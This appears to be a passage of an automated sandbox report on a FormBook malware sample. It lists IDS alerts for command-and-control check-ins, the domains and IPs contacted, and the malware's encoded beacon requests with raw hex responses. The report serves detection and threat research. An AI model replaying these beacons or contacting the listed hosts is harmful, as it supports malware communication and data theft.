Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61451 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61453 -> 203.161.49.220:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61454 -> 35.227.248.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61455 -> 35.227.248.111:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61457 -> 35.227.248.111:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61458 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61459 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61461 -> 91.195.240.19:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61462 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61463 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61465 -> 47.239.13.172:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61466 -> 208.91.197.27:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61467 -> 208.91.197.27:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.8:61469 -> 208.91.197.27:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61470 -> 66.235.200.146:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.8:61471 -> 66.235.200.146:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.evertudy.xyz

Source: Joe Sandbox View	IP Address: 66.235.200.146 66.235.200.146
Source: Joe Sandbox View	IP Address: 23.111.180.146 23.111.180.146
Source: Joe Sandbox View	IP Address: 103.197.25.241 103.197.25.241

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDIE-AS-APCloudieLimitedHK CLOUDIE-AS-APCloudieLimitedHK

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /vpfr/?eZ=3HYLM&iJiX_=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQp0lsgtKVk15wNPoNEOoMMjyN3LU6dxhHI1FgmxIsamdstg== HTTP/1.1Host: www.highwavesmarine.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /vfca/?iJiX_=PjuNaM4rErgNDqYdGwCHqm/mvS3xhxVRtMFmVQvGZApPshrl2us8sSNvZzeSfqXaMpgL6dVjOwb89B84ObwJyCFsntjSnqpwzP+jY6yNjY7ViduojwQX6Un4yLfzesgT7A==&eZ=3HYLM HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /gvk0/?eZ=3HYLM&iJiX_=PBk/k+wnSgDApBLvvStJ1Qfqn2+N7jbU3UJKISJwHJXOTy3qrqzF3aeAlE7aotAu8uhq4eiBm9zMPuEZ1b+PYRv9+O/t9WvMGJPSRuXiPeF8kiiDoShqgPK5SBbSxKLjpw== HTTP/1.1Host: www.dennisrosenberg.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /4ksh/?eZ=3HYLM&iJiX_=URmoC5X4e6K7wlVx2KbqE9eRaPOmGfPMOnoqB8M3F0zECWK+Sf67ndIbG8DedkN4mAzPYnwe388RaOdlDVpfZlnLf1iW05ccEvRvL6OrWq1JPJo5l6rk1ZbisRWcHyTHqg== HTTP/1.1Host: www.ennerdaledevcons.co.ukAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /9285/?eZ=3HYLM&iJiX_=z4MROtYNL8tsqryqYVwhIRiC1K/sXlb0hIiORiEdpZxgXp9iqAKh/lqcbyO1AV4s7Ir6nuLseD1viLy4mDmuToN1NFxkjKaOlloDdIBhV0y8LTNSISuvKrOWF9neSWjDzw== HTTP/1.1Host: www.artemhypnotherapy.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /prg5/?eZ=3HYLM&iJiX_=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBew+mwyIGh8NWq3ehH5OgTP/98tgqTRgcUpqrv79RN6be7A== HTTP/1.1Host: www.mocar.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /csr7/?iJiX_=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dBRmaO8GFftFICNQKrDMfpUc2J19e4FsCw3tJmkJ0eBlHLQ==&eZ=3HYLM HTTP/1.1Host: www.evertudy.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /qmv1/?eZ=3HYLM&iJiX_=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7duzMF8qcwSy0or9MU4FAt6yJL5XTwcCyhmcdeorymiKmWQ== HTTP/1.1Host: www.luo918.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /dmjt/?iJiX_=phzqshWM8++lNTZcZDn6PlPBsxjNAhN5IKmoEk/tfOScWWQLgCWtTff73plV+RjstliAOCijSwUPjuCIutjnEtY8cBV1InP23K1rvoSk7X1+smLn8qttMRFZOf+8GJ/nwg==&eZ=3HYLM HTTP/1.1Host: www.fungusbus.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /2dv8/?iJiX_=psGgeTZm92uMMjwvw3+ekktQKHQr8PtkyzA1wjnO7+NPXjQAxvdC6xrXVCGmGkxqQ5F0SN4BIMC+q/QNsQX29b0eHgxHefEnuc0ogV2nM4gi2K3554lDMjGRktsI1JKBOA==&eZ=3HYLM HTTP/1.1Host: www.qe1jqiste.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Source: global traffic	HTTP traffic detected: GET /n12h/?eZ=3HYLM&iJiX_=RL7POCi4RQwOAHw5RpRi0oRkNrFJHCE4O3Q4e5XJ1RgvJteO2OLpaAwWvE/Xee8N43HhgIeZk31xLdwZ5MBNiQ0n2zDakMpJnzyHioqcCYotdW6+iH3FtmEZOQT5Ykxdbw== HTTP/1.1Host: www.thesprinklesontop.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0

Source: global traffic	DNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: www.highwavesmarine.com
Source: global traffic	DNS traffic detected: DNS query: www.dxgsf.shop
Source: global traffic	DNS traffic detected: DNS query: www.dennisrosenberg.studio
Source: global traffic	DNS traffic detected: DNS query: www.shoplifestylebrand.com
Source: global traffic	DNS traffic detected: DNS query: www.ennerdaledevcons.co.uk
Source: global traffic	DNS traffic detected: DNS query: www.neworldelectronic.com
Source: global traffic	DNS traffic detected: DNS query: www.artemhypnotherapy.com
Source: global traffic	DNS traffic detected: DNS query: www.todosneaker.com
Source: global traffic	DNS traffic detected: DNS query: www.mocar.pro
Source: global traffic	DNS traffic detected: DNS query: www.evertudy.xyz
Source: global traffic	DNS traffic detected: DNS query: www.luo918.com
Source: global traffic	DNS traffic detected: DNS query: www.fungusbus.com
Source: global traffic	DNS traffic detected: DNS query: www.newzionocala.com
Source: global traffic	DNS traffic detected: DNS query: www.qe1jqiste.sbs
Source: global traffic	DNS traffic detected: DNS query: www.thesprinklesontop.com
Source: global traffic	DNS traffic detected: DNS query: www.stefanogaus.com

Source: unknown

HTTP traffic detected: POST /vfca/ HTTP/1.1Host: www.dxgsf.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflate, brConnection: closeCache-Control: max-age=0Content-Length: 206Content-Type: application/x-www-form-urlencodedOrigin: http://www.dxgsf.shopReferer: http://www.dxgsf.shop/vfca/User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Data Raw: 69 4a 69 58 5f 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 37 41 76 77 43 45 76 2f 56 76 58 73 59 59 48 7a 6f 64 2b 63 78 67 76 57 62 37 32 68 53 30 49 64 71 34 2f 6d 66 54 4d 3d Data Ascii: iJiX_=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj7AvwCEv/VvXsYYHzod+cxgvWb72hS0Idq4/mfTM=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:33:41 GMTServer: ApacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 10File not found.0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-litespeed-tag: 39e_HTTP.404expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"x-et-api-version: v1x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/x-et-api-origin: https://mocar.prox-tec-api-version: v1x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/x-tec-api-origin: https://mocar.prox-litespeed-cache-control: no-cachetransfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Wed, 03 Jul 2024 06:35:42 GMTserver: LiteSpeedData Raw: 32 33 63 64 0d 0a f4 ff 1b 22 aa 6a 3d 14 51 d1 ea e1 88 d4 ac 1e 00 8d 94 85 f3 f7 8f d0 e1 73 de 97 99 66 6f eb f3 82 90 2a 0a 88 41 90 92 cf a2 82 39 ae 93 ae 14 44 36 29 d8 20 c0 00 ad cb 1c 26 d9 7d ff f3 b7 4c eb cf c9 e5 44 c5 b3 c4 3d 3c 45 a0 c5 b6 3c cb 96 dc fe da c7 bf a8 9e e0 49 62 82 80 06 64 cb ed ca 5f fb 55 96 0f b0 b1 11 96 d9 c5 45 a5 3c b0 ea d7 dd 62 e0 8b 03 a4 c9 ee 1d bf ee d7 30 b0 33 cb 78 77 b3 7b 04 ac 42 20 23 a3 81 58 01 1b 31 f2 ce c8 b8 c8 08 21 e3 ff b7 d6 a7 30 11 2a c2 46 e9 58 55 af aa 02 f3 43 88 0f aa aa 3f ce 0f 01 f9 3d ab f6 c4 45 8a ac 0a 91 34 dd b7 82 d3 61 9c 0d ab 25 f0 2e ec b3 0c a7 53 b9 94 18 41 d3 7f 05 fa 18 aa fd 2f 0a 08 4a 13 c1 d4 cd 64 a8 d9 7c 77 66 07 76 6c 0e 81 10 5b f0 ba 5f f2 4d fe 58 63 67 7b af ba 78 45 7b 9b be 7b f5 19 07 b5 a5 c5 59 ab b5 0e 11 50 d1 25 bf 4b b7 3c 4e 77 a0 68 54 89 a3 c2 88 65 a8 27 28 c6 45 04 59 cc fb 34 69 ac b4 05 35 a7 f4 fe 59 e3 6e 48 00 ab 68 1f 7c 63 2c fc a9 e2 38 62 91 65 6d d7 b7 d2 87 36 db 37 2e 9b 23 fe 4e d0 a0 85 3b 1f 31 78 a7 89 33 40 6e 7d 44 fd df ff 35 b9 75 da c2 ad f1 4e 93 e4 b7 cb c5 7c be 24 af 7d a5 83 ec 83 6f fc 4c fd 53 d3 2c b3 e0 57 1e e3 4c f8 2a 33 e7 07 dd 3f 54 10 e7 db 8a cb 9a 91 ec ce 44 d6 ac 59 ed 62 3a 58 fb c1 58 ad 67 02 0f 9d 65 59 c7 49 87 52 00 1a 0a 4b 5b 69 34 de 65 a1 21 e5 0d 48 0b 6f ef 2d 79 a9 9d fe ef ff e4 96 ec 7a 13 75 67 54 24 79 ff 37 66 0d 40 9d 51 09 d6 ff 8d ef c0 a1 0e b7 62 88 28 e7 42 9e b1 08 7b cc 62 aa e9 7b 7d 9a 87 da 92 27 00 35 f7 e3 d8 1d 6a 1d 6e c1 19 9d dd 35 95 b6 6a 2e 41 34 36 be 50 ec ce 64 1c fc 4f f0 cf 5d 0f 9d bf 36 1f 01 d1 b8 36 12 45 06 ba d2 11 3e 07 4b 0b 5f ed b4 cc ca 2c ca 9d Data Ascii: 23cd"j=QsfoA9D6) &}LD=<E<Ibd_UE<b03xw{B #X1!0FXUC?=E4a%.SA/Jd\|wfvl[_MXcg{xE{{YP%K<NwhTe'(EY4i5YnHh\|c,8bem67.#N;1x3@n}D5uN\|$}oLS,WL*3?TDYb:XXgeYIRK[i4e!Ho-yzugT$y7f@Qb(B{b{}'5jn5j.A46PdO]66E>K_,
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:35:51 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:35:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:35:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:35:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 06:37:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateVary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: _cfuvid=HzA0L_VG2BvUmxqqNGFNalJCgeYumQ6ur4ZeQLs2dC8-1719988631107-0.0.1.1-604800000; path=/; domain=.www.stefanogaus.com; HttpOnlyServer: cloudflareCF-RAY: 89d4dd8f0c2543a6-EWRContent-Encoding: gzipData Raw: 34 39 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 db 8e db 36 10 7d f6 7e c5 44 41 f3 50 94 a6 bd 49 8a 42 2b 7b 91 b4 45 5a a0 97 00 db 22 e8 d3 82 12 c7 12 b3 14 47 25 29 cb 4e 91 7f 2f 28 52 5e 6d 76 13 20 89 5f 64 0d e7 76 e6 0c 8f 5d 3c fa e9 cf 1f ff fa e7 f5 cf d0 f8 56 6f cf 8a f0 00 2d 4c bd c9 d0 b0 bf af b2 ed d9 a2 68 50 c8 ed d9 62 51 b4 e8 05 18 d1 e2 26 db 2b 1c 3a b2 3e 83 8a 8c 47 e3 37 d9 a0 a4 6f 36 12 f7 aa 42 36 be 64 1f 46 59 2a c9 bb 59 8c 21 65 24 1e be 03 43 3b d2 9a 86 0c f8 18 e4 95 d7 b8 bd f2 b8 13 86 e0 95 e8 1d 3c 